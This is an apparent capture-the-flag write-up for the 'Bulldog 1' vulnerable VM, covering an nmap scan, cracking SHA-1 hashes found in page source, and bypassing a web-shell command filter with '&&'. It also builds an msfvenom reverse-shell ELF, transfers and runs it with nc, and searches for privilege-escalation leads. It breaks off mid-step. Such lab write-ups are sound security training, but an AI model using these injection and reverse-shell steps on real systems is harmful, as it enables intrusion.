Name: Bulldog 1
Date of Release: 28 Aug 2017
Author: Nick Frichette
Note, this VM don’t work with VMWare workstation/Fusion, that’s why after few tries I decided to install VirtualBox (ew, disgusting).
First of all, we need to find the IP address of the VM, we can use
Now, we can scan the target in order to find which services are running inside this virtual machine.
For that, I use the well known network scanner
[email protected]:~/Desktop# nmap -T5 -A -O --reason -p- 192.168.1.41 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-08 15:14 CEST Warning: 192.168.1.41 giving up on port because retransmission cap hit (2). Nmap scan report for pc-240.home (192.168.1.41) Host is up, received arp-response (0.00061s latency). Not shown: 65185 closed ports, 347 filtered ports Reason: 65185 resets and 347 no-responses PORT STATE SERVICE REASON VERSION 23/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA) |_ 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA) 80/tcp open http syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12) |_http-server-header: WSGIServer/0.1 Python/2.7.12 |_http-title: Bulldog Industries 8080/tcp open http syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12) |_http-server-header: WSGIServer/0.1 Python/2.7.12 |_http-title: Bulldog Industries MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.61 ms pc-240.home (192.168.1.41) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 253.84 seconds [email protected]:~/Desktop#
Two interesting service are running, an Python HTTP server (WSGIServer) maybe for a Django web application, and an SSH service (OpenSSH 7.2p2).
Now, we will focus our research in this web site.
The index of the web site don’t give use useful information, except the name of one employee.
I decided to actively enumerate the target with a tool used to brute-force URL(s) called
/admin/ and the
/dev/ directories sounds interesting.
The admin directory is a login form and after some research I didn’t found vulnerabilities, so, I moved into the second directory.
In the index of the second directory we can find an explication of the project and how the new team is structured and a web-shell, who is inconveniently, usable only for logged user.At this point, I knew I had to find credentials in order to to log in the admin panel and then use the web-shell. After few tries and without success, I knew I had missed something.Yep, I missed something called the source code.
The index of the
/dev/ directory has more things than expected, SHA-1 password.
I managed to find the plain text of two password:
We log into admin panel with one of this password and then we will be able to use the web shell.
Bypassing Command Restriction
At first look we can only use six commands: ifconfig, ls, echo, pwd, cat and rm. Moreover, we can’t use semicolon.
We can’t use semicolon, but maybe if I use an ampersand that will work. And yes that works and that allow use to execute any commands we want on the targeted server.
We can remotely execute arbitrary code, it’s just a question of second before we can get a reverse shell.
We generate a malicious ELF file with
[email protected]:~/Desktop# msfvenom --platform linux -p linux/x86/shell_reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 68 bytes Final size of elf file: 152 bytes Saved as: rshell
We send the malicious file into the targeted server:
#Web shell ls && nc -lp 1337 > /tmp/rshell #Attacker [email protected]:~/Desktop# nc -nvv 192;168.1.41 1337 < rshell
We change the permission of the file:
#Web shell ls && chmod 777 /tmp/rshell
Finally, we can execute the reverse shell and then spawn a pseudo TTY:
#Attacker [email protected]:~/Desktop# nc -lnvvp 1337 #Web shell ls && /tmp/rshell
We have a low privilege shell, now, our job is to find a way to gain an root access to this server. After few minutes I found an hidden directory inside the bulldogadmin home folder:
[email protected]:/home/$ cd buldogadmin/.hiddendirectory
In this directory we have two things an ASCII file and an x64 ELF binary:
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file customPermissionApp pile customPermissionAp customPermissionApp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c9f2333253302d74eff3da59653f82d28f9eb36f, not stripped [email protected]:/home/bulldogadmin/.hiddenadmindirectory$ [email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file note file note note: ASCII text, with very long lines [email protected]:/home/bulldogadmin/.hiddenadmindirectory$
The first thing that I try with this ELF file is to search for any kind of strings that I can found inside the compiled binary and fortunately for us, this ELF file contain a password:
The password is: